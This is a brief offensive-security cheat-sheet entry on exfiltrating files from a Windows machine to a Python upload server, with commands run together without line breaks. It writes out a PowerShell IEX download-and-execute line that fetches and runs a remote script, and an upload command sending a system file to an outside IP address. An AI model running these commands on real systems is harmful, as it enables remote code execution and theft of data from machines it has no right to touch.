Using python to web uploads
pip3 install uploadserverpython3 -m uploadserverUpload file to python server using powershell
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hostsInvoke-RestMethod -Uri $Uri -Method Post -InFile $FilePath -ContentType "multipart/form-data"Last updated